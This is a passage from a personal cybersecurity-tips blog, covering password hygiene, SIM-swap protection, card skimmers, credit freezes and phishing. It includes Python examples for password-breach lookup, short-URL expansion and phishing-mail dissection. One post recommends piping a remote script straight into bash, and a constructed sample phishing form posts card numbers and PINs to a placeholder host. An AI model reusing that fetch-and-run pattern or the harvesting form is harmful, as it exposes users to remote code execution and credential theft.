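# 5BAA61E4C9B93F3F0682250B6CF8331B7EE68FD8. The counts and other suffixes are invented.
FAKE_RANGES = {
    "5BAA6": (
        "1E4C9B93F3F0682250B6CF8331B7EE68FD8:3861493\n"
        "00000000000000000000000000000000001:0\n"     # padding-style entry
        "ABCDEF0123456789ABCDEF0123456789ABC:12\n"
    ),
}


def fetch_range_fake(prefix: str) -> str:
    """Offline stand-in for fetch_range_live, keyed by prefix."""
    return FAKE_RANGES.get(prefix, "")


if __name__ == "__main__":
    for pw in ("password", "correct horse battery staple"):
        n = check_password(pw, fetch_range_fake)
        print(f"{pw!r}: {'seen %d times' % n if n else 'not found'}")
```

To check a real password, call check_password("your password here") with the default fetcher; it makes one HTTPS request carrying nothing but the five-character prefix. The Add-Padding header asks HIBP to pad every response to a similar size, so an observer of your traffic cannot infer the prefix's bucket from the response length either.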

If you use more than one email address now or in the past, repeat this for each e-mail.

Further details can be found at the following links:


Wednesday, January 3, 2024

New Year, New Password!


As part of your new year’s resolution, it is a good idea to get your online security a fresh start in 2024. With cyber threats becoming an unfortunate norm these days, it's time to enhance your cyber hygiene to protect yourself from becoming a cybercrime victim this year. Change all your online account passwords, especially financial/banking, shopping, social media accounts. The following is a list of things to consider.

  • Change your passwords (also change username if permitted)
  • Enable password-less logins if available.
  • If you don’t have 2FA enabled, make sure to enable it.
  • If the site supports stronger 2-factor mechanisms, like Authenticator app or better yet hardware key based, use that instead of SMS based 2-factor; While SMS based is better than just password alone, it is prone to attacks like SIM swap scams 
  • Validate your recovery mechanisms.
    • Reset recovery app keys (if any)
    • Validate recovery e-mail.
    • Reset onetime login codes.
  • Last but not least, invalidate all logins (i.e. log out from all devices and log back in). Though this step may be enforced by the password change, some sites don’t enforce it.

Remember, cyber hygiene is like flossing, not the most glamorous, but essential for long-term digital health. This year, make your online security a resolution you actually stick to. Have a safe 2024 and beyond!


Wednesday, July 12, 2023

T-Mobile SIM swap protection

Many of us know or have heard how easy it is for cybercriminals to circumvent SMS-based 2FA. SIM swap scams have been around for a while, but according to the FBI they are currently on the rise. Ideally, you should use an authenticator app or, better yet, hardware keys for 2FA, but if the website only offers SMS-based 2FA you have no choice but to use that. Unfortunately, a lot of websites, including some financial/banking websites, offer only SMS-based 2FA. If you are a T-Mobile customer, you can make your SMS-based authentication slightly safer with T-Mobile's SIM swap protection feature. I don’t know how well it actually protects, but it is better than nothing. Log into your T-Mobile account and navigate to Account/Profile/Privacy & Notification/SIM protection to toggle it on, as shown in the screenshot below. For convenience, the link below will take you to this setting directly if you are already logged into your T-Mobile account.

https://www.t-mobile.com/account/profile/fraud-block/simswap


Related Link:

https://www.wirefly.com/news/fcc-proposes-new-rules-stop-sim-swap-attacks


Saturday, July 1, 2023

Three Simple Online Banking Safety Tips


Here are three simple steps you can take while doing online banking to minimize your chances of becoming a victim. As the title says, these steps are simple and do not take much time or effort to follow.

  1. Before logging in to your banking website, whether for financial transactions or even just to review your statement, close all other tabs in your browser. If you are paranoid, temporarily disable any browser extensions you have installed; you can turn them back on later.
  2. While you are logged into your banking website, do not do anything else: no Google searches, Facebook, Instagram, or other browsing, and specifically do not read email or, worse, click on a link your buddy sent you to "check it out". You can do all that after step 3 below.
  3. Once you are done with your online banking business, make sure to log off. Many banking websites these days do protect you by logging you off automatically after a period of inactivity. However, don’t rely on that, because there are still some poorly built online banking websites that don’t log you out in a reasonable time or, worse, don't do anything at all.

Simple Cyber Hygiene Practice


Here is some advice on simple cyber hygiene practices to protect yourself online. You really don't have to take extreme steps to bulletproof your online accounts, because if a persistent and determined cyber criminal decides to target you (i.e., spear phishing), there is very little you can do to stop them, especially if you are a high value target. Luckily, most of us don't fall into that category, unless you are dumb enough to divulge your personal info by posting on social media, which makes you a target. However, with a bit of effort on your part, you can make it slightly harder for cybercriminals to scam you, so they will move on to easier targets.

"You don’t have to run faster than the bear to get away. You just have to run faster than the guy next to you."

Trust me, there are still stupid people out there who use "123456" as a password (BTW: "123456" is one of the top 10 passwords in 2022, along with "password"), feeding this fast growing $8 trillion cybercrime business.

Now, how do you make it "slightly harder"? The answer, as you may have heard many times, is: don't rely on user/password alone, even if you have a strong password like "~ti0ah5%#W". Though a strong password is the first step in making it harder, it does not protect you in all cases, as criminals have other ways to gain access to your stuff. So, ensure that you enable 2FA (two factor authentication) wherever it is offered. If multiple methods are provided for 2FA, like SMS and an authenticator app, choose the latter, as SMS-based 2FA gives a false sense of security, though it is still better than just user/password.

Friday, June 2, 2023

Facebook knows way more about you than you think!

We all know that Facebook collects data on all of us. They manage to do that in different ways, including via 3rd-party web browser cookies; an explanation of 3rd-party cookies goes beyond the scope of this blog, but you can read about it here if you are interested in knowing more. While 3rd-party cookies are slowly being phased out, the alternative, i.e. FLoC proposed by Google, is, according to many privacy advocates, even worse ... so for now, just assume Facebook and other platforms will always have a way to spy on you.

While there are ways to restrict what Facebook collects (follow the steps at the end of this blog), there is not a whole lot you can do to make them stop other than deleting your Facebook account. The reason is, Facebook generates substantially all of its revenue by selling ads, so they have to monitor your online activity to slap you with targeted ads and curated content based on your web browsing behavior, i.e., the sites you visit, shop at, like, etc. At the end of the day, Facebook knowing that I have T-Mobile wireless, or shop at Amazon, or browse Reddit, etc., is not a big deal for me; I just don't care. However, when I looked at what websites are sharing with Facebook, specifically a financial institution that I do business with, I was very concerned. My financial institution (I will not mention their name here) shared with Facebook something related to my activity, which is scary, see below ...


It is unclear to me what they shared, since I don't have the details other than Facebook telling me they did. I have the habit of clearing all cookies on banking and financial websites frequently, so unfortunately, I can no longer access this specific cookie in my browser to see the content of what was shared with Facebook! However, based on the name of the activity shared, i.e., "COMPLETE_REGISTRATION", I can only assume it is not something I would like them to share, whatever it is. If it was just "PAGE_VIEW" like all other sites, I would be ok with it, but even then, why would Facebook need to know what bank website I visit? The only thing I remember is opening a new account and transferring money on those 2 days at the exact times mentioned, which caused my concern. Why on earth does Facebook need this information? Just to give some perspective, this is just one specific instance of a website I have discussed above; there could be a crap ton of them we visit every day sharing all kinds of stuff w/ Facebook 😮.

Finally, if you got this far, you can follow the steps below to tell Facebook to quit doing this, at least for now, until they figure out new ways of profiting from you 😃

Update (May 22, 2024): Since many page links and interfaces have changed since this original post back in June 2022, I updated the details below as of today.

While logged in to Facebook ...

  1. Navigate to https://www.facebook.com/off_facebook_activity
  2. Click "Manage future activity"
  3. Click on "Disconnect future activity."

This will also clear all the stored activity, so you don't need to clear that separately. For visual reference, the screenshots for steps 2 and 3 are below.




Android Battery Drain

 

If your Android phone runs out of battery sooner than you expected, you are not alone. The culprits are power hungry and poorly designed smartphone apps you may have installed; trust me, there are a lot of them, including popular apps many of us use on a daily basis. To give an example, the “Withings Health Mate” app that I use tracks weight from the Withings Digital Scale, and for some reason it adds a background task to continually sync the weight from the scale to the cloud. This is insane ... why on earth does anyone need their weight continually synced to the cloud? A better design would be to sync to the cloud whenever you open the app to check your weight history; there is absolutely no need to sync body weight continually, especially when it involves using your precious battery power. To make matters worse, some of them go totally nuts and do some crazy stuff. See my findings on Fitbit at the link https://link.selvansoft.com/crazy-fitbit

Anyway, here is the list of the top 10 apps that drain the battery a lot.

  1. Fitbit
  2. Uber
  3. Skype
  4. Facebook
  5. Airbnb
  6. Instagram
  7. Tinder
  8. Bumble
  9. Snapchat
  10. WhatsApp

In my opinion, any phone can and should last a full day with heavy usage and two days on normal usage without having to charge, but if you have one or more of these installed, it is highly unlikely your phone battery will last all day long.

Solution:

The good news is, there is a way to limit battery use and extend your phone’s ability to last a whole day or two. For example, my phone battery lasts 2 full days on regular use. If you happen to run one of the apps above, just follow the video at the link below to adjust the settings and enjoy a longer battery charge!

https://selvansoft.com/public/videos/battery_optimize.mp4

Note: Some apps may not function properly while running in the background with this change, but most apps should work just fine. If you have any of them installed, just open each of them once so they will be listed on the recent list, so you can easily find them; otherwise, just search all the installed apps to find them and change the setting.

Finally, if you rarely use any of these power hogs, just uninstall them and install them back when you find the need to use them. Another option is to enable “Google Play Instant” to run apps w/out installing them (note: not all apps support this function). Go to your Google Play Store app Settings/General/Google Play Instant and enable it as shown in the screenshot.




Thursday, May 25, 2023

How to protect yourself from Card Skimmers

Before I go into steps to protect yourself from card skimmers, it is important to understand the various protocols used in POS (point of sale) devices to read your credit/debit cards. There are 4 types: swipe (magnetic stripe), chip (chip in card), tap (RFID) and smartphone (NFC). I won’t go into the details on each of these, but it is sufficient to be aware that there are multiple technologies involved in POS transactions. Now, here are different ways to prevent, or at least lower, your chances of becoming a victim of card skimming, listed in order from most effective to least effective.

  1. Use your 'smartphone' to pay (Google Pay, Apple Pay) wherever you can. How to get this set up is outside the scope, but it is very easy. This is the strongest protection you get today, and it is extremely difficult (if not impossible) for criminals to scam you. Most POS devices accept these today, although if you live in the US (lagging behind the world), it is not uncommon to see vendors using ancient devices that do not support smartphone pay.
  2. Use 'chip+pin' if your card and the POS device support it; this is the second-best way. If you live outside of the US, like in Europe or even India, you are golden, because it has been the standard for POS devices for many years and you are required to use a pin to do a transaction. Every time I was on a business trip to India, I always found myself arguing with the waiter at restaurants: “hey, I don’t have a pin” 😄. If you live in the US, it sucks, since chip+pin is not mandated for whatever reason.
  3. Use 'chip' if your card and the POS device support it. Most credit card companies/banks these days issue cards with a chip, but unfortunately in the US, they also include the magnetic stripe to cover the lazy ass vendors who still use the archaic magnetic swipe. This pretty much negates the benefit of the chip, as skimming devices can still read your magnetic stripe. So, if you live in the US, what I’d recommend is to scratch the magstripe on purpose (I did that on all my cards). Use a sharp knife or steel wool to scratch the magstripe to the point that it can’t work. Keep one card with a magstripe in case the vendor says, “we don’t have a chip reader, you have to swipe”. Trust me, these guys won’t change unless they are mandated by law at the state/federal level to switch to modern POS.
  4. Use ‘tap’ if the POS device and your card support it. If you see this symbol on the back of your card, then it is enabled for RFID. Again, the US lags on this protocol as well. While this is the most convenient way to make a purchase, there is a huge security hole in this method which enables the most sophisticated attacks, which I won’t go into in detail, but there are things you can do to avoid them, i.e., use an RFID blocker (you can buy them at Amazon for $2 a piece) and place it in your wallet/purse along with your credit/debit cards equipped with this technology. I use these if you need a recommendation: https://link.selvansoft.com/1307688f
  5. Use a 'check', which of course has many problems of its own, but it may be slightly better than the last one below.
  6. Lastly, if none of the above options are available to you, you have no choice but to use magstripe/swipe. You might want to spend a few seconds looking for signs of tampering on the POS device. See the picture at the top of this blog for signs to look for. Obviously, you won’t have a lot of time; besides, you may annoy other customers behind you if you spend too much time poking around the device 😄

Finally, you can and should set up text alerts for when your card is charged, even for $1. Almost all bank/credit card institutions provide the feature to TXT. The only annoying thing is getting a TXT for everything you do on your card, but it is better than being a victim.

My text alerts look like this (see screenshot below). Notice it says “card ending in xxxx was not present”; that has multiple meanings but, in this case, it means these transactions were done without the card, i.e., done with Google Pay, which I use everywhere it is accepted, and it’s the most secure way today to pay at POS. Period.


Tuesday, May 23, 2023

ProtonVPN - fast & free

ProtonVPN

Not sure if any of you are aware of Proton Mail, which is a secure (encrypted) email service and has been around for a while. I signed up for their free tier email service a while back but never used it, since I don’t want to pay for yet another cloud space and the free tier space of 500 MB is not much for daily use.

Anyway, I knew they had a free VPN as well but never tried it until recently, and I am blown away by the speed: very low overhead compared to the other VPN services I have used. Granted, it is WireGuard, a modern VPN protocol, but still, I literally get the same speed as provided by my ISP. At first, I could not believe it and started measuring speed with every speed test tool out there, and they all came back with more or less the same speed, which is roughly the same as what I get from my ISP (see screenshot) without the VPN layer. At this point, there is absolutely no reason not to use them permanently… and it's free!



How to get ProtonVPN

Head over to https://proton.me and sign up for a free account, and you get an encrypted mail service and 1 VPN connection for free. WireGuard is pretty simple to use; all you have to do is install WireGuard (https://www.wireguard.com/install/) and get the credentials/keys from ProtonVPN, and off you go.


How to run WireGuard (macOS or Linux)

After WireGuard is installed, follow the simple steps shown in the screenshot below to start/stop WireGuard. The screenshot is on macOS, but it should be the same on Linux and possibly on Windows under PowerShell as well. The third argument is the name of your WireGuard configuration file without the '.conf' extension. In my case it is lion.conf. This is the configuration file you downloaded from ProtonVPN, and it should be copied to /usr/local/etc/wireguard/ on macOS, or /etc/wireguard on Linux.

Wednesday, April 5, 2023

HOWTO: Credit Freeze

Data breach incidents are very common these days. In spite of all the efforts and money spent by organizations on robust cyber security measures to protect themselves, data breaches continue to occur. With countless sensitive records compromised, it serves as a stark reminder that no organization or individual is immune to cyber threats, and as an individual, there is nothing you can do to stop it. However, there is one thing you can do to protect your identity and personal data: add a credit freeze, on demand or forever.

As a matter of fact, I don’t see a need for your credit report to be in “unlocked” status unless you apply for a loan, bank account, credit card, etc., which you don’t do every day. So, why does it need to be in “unlocked” status? When you need it, you can, with a click of a button (at most bureaus), unlock your credit, get your business done and lock it back.

I have listed below all you need (link/phone/address, etc.) to place a “free” (yes, free) credit freeze to avoid becoming a victim of identity theft, fraud and scams that could potentially wipe out your hard-earned money and ruin your financial reputation, possibly forever!

EQUIFAX:

Online: https://my.equifax.com/membercenter
By phone: 800-685-1111
By Mail: Equifax Security Freeze, P.O. Box 105788, Atlanta, Georgia 30348-5788
Online Account:
Terminology: Freeze
How To Lock: Home and select Freeze on the side bar

EXPERIAN:

Online: https://www.experian.com/freeze
By phone: 888-397-3742
By Mail: Experian Security Freeze, P.O. Box 9554, Allen, TX 75013
Online Account:
Terminology: Security Freeze
How to Lock: Experian is sneaky & goes out of the way to hide the free service pushing customers to pay for the “File Lock” (a paid service). Use the direct link below to get to the ‘free’ option.

TRANSUNION:

Online: https://service.transunion.com/dss/
By Phone: 888-909-8872
By Mail: TransUnion LLC, P.O. Box 2000 Chester, PA 19016
Online Account:
Terminology: Credit Lock
How To Lock: Dashboard has Lock/unlock button
Direct URL: N/A

INNOVIS:

Online: https://www.innovis.com/securityFreeze
By Phone: 866-712-4546
Online Account:
N/A

Final Note: The information above is designed to be simple and easy to follow, so that anyone can place a credit freeze quickly and easily. Permanently freezing your credit reports is sufficient to protect yourself from identity theft. However, I did encounter a more complex process outlined on Reddit (link below) that focuses on all the steps to take if you were indeed an identity theft victim. Some of the steps mentioned there are very extreme and complex, but I suppose overprotecting yourself isn't bad, especially when it comes to your identity.

https://www.reddit.com/r/IdentityTheft/comments/uvv3ij/psa_freezing_your_three_main_credit_reports_is/

Saturday, March 18, 2023

ChatGPT vs. Google search

Whether you're looking for the latest news, a specific product, or a how-to guide, Google search can help you find what you need in a matter of seconds. We all use Google search every day at least once, and some people like me use it multiple times a day.

Ever since ChatGPT came along, I find myself going there in the hope that I will find what I am looking for faster and more easily using the conversational search approach. However, I often find myself falling back to Google search, because 4 out of 5 times ChatGPT gives me wrong information and directs me down the wrong path (see the screenshot at the end). At this point, I am convinced that it is actually faster for me to go to Google search in the first place for accurate information. Granted, my search needs are highly technical in nature, and I understand that is not exactly the same for everyone, but still, I think Google search is faster and, most importantly, accurate, at least for now.


What do you think?


Just for fun, I asked ChatGPT the question, and here is the response I got.

When it comes to finding specific information quickly, Google search is still the go-to tool for most people. However, if you want a more conversational and personalized response to your query, ChatGPT can be a great option.

Here is a screenshot of one of the flat-out wrong answers from ChatGPT to one of my searches/questions, given with a high degree of confidence 😆



Tuesday, March 14, 2023

Bloatware in Pixel?

I only buy Google Pixel phones to avoid carrier- and phone manufacturer-installed, un-removable bloatware, but little did I know these bloat kings like Samsung, Verizon, AT&T, etc. managed to shove their crap onto my Pixel phone, and I have no clue how they managed to do that. I accidentally discovered some, and believe it or not, you can't remove it without ‘root’ing your phone, which will disable monthly security patches. Long story short, I wrote a script to disable them from running.

Feel free to use this script, but you need to have Android adb installed on your computer and your phone connected with a USB cable in order for this script to work.

https://github.com/aselvan/scripts/blob/master/andriod/remove_bloatware.sh

If your phone is not a Pixel, you will find a crap ton of bloatware. If you give me the full list (i.e., run my script with the '-a' option), I can update the bloatware list in the script so you can remove them. Right now, the list I have hardcoded in this script only includes what I found on my Pixel, which are listed below.

Finally, here is a quiz to see if anyone can answer this question (post your answer as a comment). Say you found a strange package called ‘org.thoughtcrime.securesms’ installed on your phone, i.e., running my script with the argument ‘-p org.thoughtcrime.securesms’ checks your phone to see if you have it. Do you think it is malware? 😜

PS: all the scripts I post on my GitHub repo are digitally signed by me, so they are as safe as can be to run, and if you feel brave, you can run them directly in a bash shell (macOS or Linux) like so below.

curl -s https://raw.githubusercontent.com/aselvan/scripts/master/andriod/remove_bloatware.sh | bash -s -- -h


Tuesday, March 7, 2023

Free Cloud storage

Yeah, you read it correctly, free 😁. We all know the phrase “there ain't no such thing as a free lunch”, but there is a way to store all your family vacation pictures and videos for free, with a minor caveat.

All of us have a ton of vacation pictures, videos and such lying around on our computers, phones, USB sticks, camera SD cards, etc. While it is always a good practice to back up your precious memories to an external hard drive, it is still not good enough. A hard drive is not permanent storage, as it can fail anytime. What would you do if all your precious memories went down with your backup drive? While cloud storage does address this problem, it does cost money. What if I told you that you can store your stuff in the cloud for free? Read on if interested …

Videos:
First, let’s start w/ video files, as it’s pretty easy. I am sure many of you have used YouTube to upload your videos to share w/ your family & friends, or even with the public in some cases. Did you know that you can also upload all your personal videos there and mark them as “private” (see screenshot below) so they're visible only to you?


That is right, you can upload literally everything you have in video format to YouTube. As of now, Google does not charge anything for storage, and it’s been that way for years; that may change down the road, but for now it is absolutely free. While YouTube runs a super aggressive compression algorithm to maximize space, it does not impose any limit on the length or size of files you can upload, and the loss of quality is not noticeable at all. I just uploaded a really huge video file (15 GB) and Google is cool w/ that. If you don’t know how to upload files to YouTube, follow these simple steps. While logged in with your Gmail/Google account, head over to https://studio.youtube.com/, select Dashboard/Upload Videos and drag/drop as many videos as your heart desires. Before you do that, you need to go to “Settings”/”Upload defaults” to set visibility to “Private”. There you have it.

Pictures:
Obviously, video is easy, but how do you upload pictures, since YouTube only accepts video? Well, you could generate a video of your pictures, maybe one video for each vacation or event, and upload them as videos. This is the minor caveat I mentioned earlier, i.e., you have to do some work to convert your pictures to video, which is not that hard. To make it easy, I wrote a script to do just that on macOS, or any Linux or ChromeOS based computer. Windows users can run the script under WSL (Windows Subsystem for Linux) on Windows 10/11. If you are like me, who always creates slideshows with vacation pictures anyway, converting to video is not a bad option at all. The script to convert pictures to video is available at my GitHub repo at the link below.


It is pretty simple to run the script. First, copy all your pictures of a specific event or vacation trip to a directory and run this script on that directory as shown below. You can specify a title to use with the -t option and use any MP3 for background audio. The generated output video will be in the same directory. Now you can upload the video to YouTube!


To make bulk creation easy, I wrote another script that reads a CSV file where you can define where your files are and what title and background to use, and run it in one shot to create videos of all of your files, as long as they are in separate directories. See the script below.


Finally, if you have any questions on the options for generating video, feel free to ask. Enjoy!

For completeness, I want to mention there is a very complex method available to literally store any of your files, including documents, zip files, etc., on YouTube for free. That of course requires a lot more technical knowledge/skills that is way beyond the scope of this blog. If interested, you can read about it here https://hackaday.com/2023/02/21/youtube-as-infinite-file-storage/ and here https://gizmodo.com/backup-data-on-youtube-hack-white-noise-aka-isg-1850261527 . Keep in mind these are not reliable methods, as one tweak in the compression algorithm will render your data unreadable and useless, so I would not use these methods to store anything important.




Friday, March 3, 2023

Phishing scams using URL Shorteners

I am sure many of you are familiar with shortened URLs that redirect you to a different, long-winded URL when clicked. If you’ve ever seen or used a tinyurl.com or bit.ly link, you are already familiar with how they work.

These short URL services like bit.ly, etc., have been abused by scammers for their phishing campaigns for a while now. Recently, there has been increased use of this technique, specifically leveraging reputable/legitimate websites like linkedin.com (see link below), since malware protection software and spam blockers are unlikely to block short links created by reputable organizations like LinkedIn.

https://www.malwarebytes.com/blog/news/2023/02/linkedin-slinks-abused-to-phish-email-and-payment-details

So how do you know if a given short URL is not going to take you to a shady phishing site or, worse, to a malware-laced website? Essentially, what you need is the inverse of shorturl, i.e., longurl 😁, which expands the short URL to show where it would take you if you were to click. That is exactly what I have done in the simple tool below. Feel free to use it.

https://selvansoft.com/longurl/

Note: Try expanding this sample short link (https://bit.ly/3YuGbTA) using the longurl service above. For safety, the redirect address is checked w/out actually traversing there, and it goes just one level deep only. There is also urlscan.io, which does a lot more if you want to try that as well.
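The same one-hop, no-traversal expansion in Python, as an added example that is not the author's longurl tool: a HEAD request with redirects disabled reports only the Location header, so the destination is never visited. The shortener it talks to is a constructed local stand-in (FAKE_LINKS, placeholder hosts) so the example runs offline.

```python
"""Expand a short URL exactly one hop without contacting the destination.

Added example, not the longurl tool from the post. http.client never follows
redirects, so a HEAD request reveals the Location header and nothing else is
fetched. A tiny local HTTP server stands in for bit.ly so this runs offline.
"""
import http.client
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import urljoin, urlsplit

REDIRECT_CODES = {301, 302, 303, 307, 308}


def expand_once(short_url: str, timeout: float = 5.0) -> dict:
    """Return {"status": int, "location": str | None} for a single hop.

    Only the shortener host is contacted; the redirect target is reported,
    not requested (one level deep, as the post's tool does).
    """
    parts = urlsplit(short_url)
    conn_cls = (http.client.HTTPSConnection if parts.scheme == "https"
                else http.client.HTTPConnection)
    conn = conn_cls(parts.hostname, parts.port, timeout=timeout)
    try:
        path = parts.path or "/"
        if parts.query:
            path += "?" + parts.query
        conn.request("HEAD", path, headers={"User-Agent": "longurl-example/1.0"})
        resp = conn.getresponse()
        location = resp.getheader("Location")
        if location is not None:
            # A relative Location is resolved against the short URL itself.
            location = urljoin(short_url, location)
        return {"status": resp.status, "location": location}
    finally:
        conn.close()


def is_redirect(result: dict) -> bool:
    """True when the shortener answered with a redirect to somewhere else."""
    return result["status"] in REDIRECT_CODES and bool(result["location"])


# --- constructed stand-in for a URL shortener (demo/test only) ---------------
# short path -> (status, destination). Destinations are placeholder names.
FAKE_LINKS = {
    "/abc123": (301, "https://legit.example/newsletter"),
    "/evil99": (302, "http://login-verify.invalid/bank"),
}


class _ShortenerHandler(BaseHTTPRequestHandler):
    def do_HEAD(self):
        hit = FAKE_LINKS.get(self.path)
        if hit is None:
            self.send_response(404)
            self.end_headers()
            return
        status, dest = hit
        self.send_response(status)
        self.send_header("Location", dest)
        self.end_headers()

    do_GET = do_HEAD  # a GET gets the same redirect, just no body

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_fake_shortener() -> tuple:
    """Start the stand-in shortener on an ephemeral localhost port.
    Returns (server, base_url); call server.shutdown() when done."""
    server = HTTPServer(("127.0.0.1", 0), _ShortenerHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, f"http://127.0.0.1:{server.server_address[1]}"


if __name__ == "__main__":
    server, base = start_fake_shortener()
    try:
        for path in ("/abc123", "/evil99", "/missing"):
            r = expand_once(base + path)
            where = r["location"] if is_redirect(r) else f"no redirect (HTTP {r['status']})"
            print(f"{base}{path} -> {where}")
    finally:
        server.shutdown()
        server.server_close()
```

Pointed at a real shortener, the reported location is the place to inspect (or feed to urlscan.io), not to open.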

PS: I also have a very simple shorturl service, similar to bit.ly, here: https://selvansoft.com/shorturl/ Again, feel free to use it.

Thursday, January 26, 2023

DocuSign sends sensitive info in plain text

Yes, you read the title correctly. DocuSign indeed sends everything, including sensitive information, to you after you complete "docusigning" something.

Have you ever used the DocuSign service for signing any documents? I am sure many of you are familiar with DocuSign, because it is used very widely everywhere for document signing online. If you think you haven't used it, think again; you may have used it and not known about it. Typically, a lot of the information you enter when you sign any legal document, like your loan application, lease contract, loan, or even a job acceptance these days, goes via DocuSign. When both parties have completed the signing process, DocuSign will send you a mail with a copy of the fully signed/executed document (PDF file) once. The PDF file may likely contain your SSN, DOB, address, phone number, account number and much other sensitive information you may have entered during the signing process. Guess what, all of this is in "plain" form and sitting in your email (Gmail, Yahoo, etc.). If you don't believe me, search your email for mail from docusign.net and open the attachment they sent you. You would not believe what you see.

If you use Gmail (who doesn't?), here is an easy search filter to quickly show all mails from DocuSign containing PDF files.

"from:(docusign.net|docusign.com) has:attachment filename:pdf"

The screenshot below will help if you don't know how to search for e-mail messages with a filter.



How to spot phishing attempt - an anatomy of a phishing Email

Note: This is an old post from 2014 at blog.selvans.net. It was moved to this site as part of a migration. Though it is more than 8 years old, it is still valid and relevant.

If you consider yourself someone who knows how to spot spam and phishing emails, you won't learn anything new here. Others who want to learn how to spot spam or phishing mails, especially if you are someone who simply can't resist clicking on links in your email no matter how many times you were told not to :), read on …

Like most of you, every now and then I do get a phishing mail delivered to my inbox. Gmail usually does a pretty good job of filtering spam and phishing mails; however, this particular one shown here slipped through Gmail's spam filter because of my own filter (a discussion on why it slipped is outside the scope of this blog). Anyway, here is a screenshot of the phishing mail we will be dissecting in this blog. Apparently, Citibank all of a sudden lost everything they know about me except my email address :). You can stop right here, since it is clearly a phishing attempt, but for the purpose of this exercise, let's continue. At a glance, for a novice email user, it looks legitimate: it does appear to have come from citibank.com, and it is instructing me to download the attachment called Citibank.html. It must be important since it is from the Citibank alert service, and I should immediately download the file and double click it, right? The first thing you need to understand is that the 'mail from' (i.e., in this case alerts@citibank.com) is the easiest thing to fake. To find out where it really came from, you need to see the full email headers via the “show original” option. [Note: The screenshot below is from Gmail, but as far as I know all mail clients like Yahoo, Hotmail, Outlook, etc. allow you to view the 'raw' content of the mail, which will show all mail headers.]



When you select 'show original' as shown above, you get the 'raw' mail content including all the mail headers (see annotated screenshot below).



From the above screenshot, you can clearly see Google's mail server received this mail from decisiontreetech.com, not from citibank.com (highlighted in yellow). Does this mean decisiontreetech.com is the phishing source? The answer is no. In this case, it looks like someone from that company was infected with malware, allowing a remote hacker to hijack their email account session to send phishing mail via that company's mail server. If you look further down, you can see a remote host from France with the IP address 62.244.93.88 initiated this message. For many of you, unless you are in the cyber crime division of law enforcement, at this point it doesn't matter who the criminal is (we will discover that shortly below); you know this is fake, and you should simply delete this mail and go on with your life. You can continue to read if you are interested in dissecting this mail further ...

Now, we are going to examine the attachment the crook wants you to download so he can collect your information. Typically, you can view the raw mail safely with your browser to see what the attachment contains and make sense of it, as long as it's not binary. In this case, it is supposed to be an HTML file. However, the crook encoded the content of the HTML text in base64, so it is not easy to view what he is trying to do and where he intends to send your information (see the screenshot below).


I could just download the file to let the browser decode the base64-encoded HTML for me, or simply copy the content and decode it myself. The following screenshot is the relevant part of the HTML file, decoded using an online decode tool from www.base64decode.org



Finally, you can see they are posting your information to a web server at 69.73.182.242, which eventually mails everything to two email addresses, i.e., sammy78@iname.com and effeferegregregre@yahoo.com. There you have it.
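The same dissection (raw headers, Received chain, decoding the base64 attachment without rendering it, and reading the form's post target) done with Python's standard library, as an added example that is not the method or tooling from the post. The message is constructed for this example; its hosts, addresses and IPs are placeholders, not the ones from the real mail.

```python
"""Dissect a suspicious mail offline: walk the Received chain and decode the
attachment without rendering it.

Added example (not the post's method). SAMPLE_RAW is a constructed message:
it claims to come from a bank, the Received trail shows it entered through
an unrelated host, and the attachment is a base64-encoded HTML form.
All hosts, addresses and IPs are documentation placeholders.
"""
import base64
import email
import re
from email import policy
from email.message import EmailMessage

_FORM_HTML = (
    "<html><body><form method='post' action='http://198.51.100.7/collect.php'>"
    "Card number: <input name='cc'><br>PIN: <input name='pin'>"
    "<input type='submit' value='Verify'></form></body></html>"
)
SAMPLE_RAW = (
    "Received: from mail-relay.example-isp.net (mail-relay.example-isp.net [203.0.113.9])\r\n"
    "\tby mx.mailbox.example (Postfix) with ESMTP id 1234; Sun, 12 Jan 2014 10:00:00 +0000\r\n"
    "Received: from [192.0.2.44] (unknown [192.0.2.44])\r\n"
    "\tby mail-relay.example-isp.net with ESMTPA; Sun, 12 Jan 2014 09:59:58 +0000\r\n"
    "From: Bank Alerts <alerts@bank.example>\r\n"
    "To: victim@mailbox.example\r\n"
    "Subject: Action required on your account\r\n"
    "MIME-Version: 1.0\r\n"
    'Content-Type: multipart/mixed; boundary="XX"\r\n'
    "\r\n"
    "--XX\r\nContent-Type: text/plain\r\n\r\nPlease open the attached form.\r\n"
    '--XX\r\nContent-Type: text/html; name="Bank.html"\r\n'
    "Content-Transfer-Encoding: base64\r\n"
    'Content-Disposition: attachment; filename="Bank.html"\r\n\r\n'
    + base64.b64encode(_FORM_HTML.encode()).decode() + "\r\n--XX--\r\n"
)

# "from <who handed it over> (<what the receiving server saw>)"
_RECEIVED_FROM = re.compile(r"^from\s+(\S+)(?:\s+\(([^)]*)\))?", re.IGNORECASE)
_FORM_ACTION = re.compile(r"<form[^>]*\baction=['\"]([^'\"]+)['\"]", re.IGNORECASE)


def parse_mail(raw: str) -> EmailMessage:
    return email.message_from_string(raw, policy=policy.default)


def received_chain(msg: EmailMessage) -> list:
    """Hops oldest first. Received headers are prepended by each server, so
    the last one in the message is the first hop, the one that tells you
    where the mail really originated."""
    hops = []
    for hdr in reversed(msg.get_all("Received", [])):
        m = _RECEIVED_FROM.match(str(hdr).replace("\r\n", " ").replace("\n", " "))
        if m:
            hops.append({"claimed": m.group(1), "seen_as": m.group(2) or ""})
    return hops


def header_domain(msg: EmailMessage, name: str) -> str:
    """Domain in an address header such as From (the easiest part to fake)."""
    addr = msg[name].addresses[0].addr_spec if msg[name] else ""
    return addr.rsplit("@", 1)[-1].lower()


def decode_attachments(msg: EmailMessage) -> dict:
    """filename -> decoded text. get_payload(decode=True) undoes the base64
    transfer encoding; the content is inspected as text, never opened."""
    return {
        part.get_filename() or "unnamed": part.get_payload(decode=True).decode("utf-8", "replace")
        for part in msg.iter_attachments()
    }


def form_targets(html: str) -> list:
    """Where a decoded HTML form would post whatever the victim types."""
    return _FORM_ACTION.findall(html)


def dissect(raw: str) -> dict:
    msg = parse_mail(raw)
    hops = received_chain(msg)
    attachments = decode_attachments(msg)
    return {
        "from_domain": header_domain(msg, "From"),
        "first_hop": hops[0] if hops else None,
        "hop_count": len(hops),
        "targets": sorted({t for html in attachments.values() for t in form_targets(html)}),
    }


if __name__ == "__main__":
    report = dissect(SAMPLE_RAW)
    print("From: header claims", report["from_domain"])
    print("Earliest Received hop:", report["first_hop"])
    print("Attachment posts to:", report["targets"])
```

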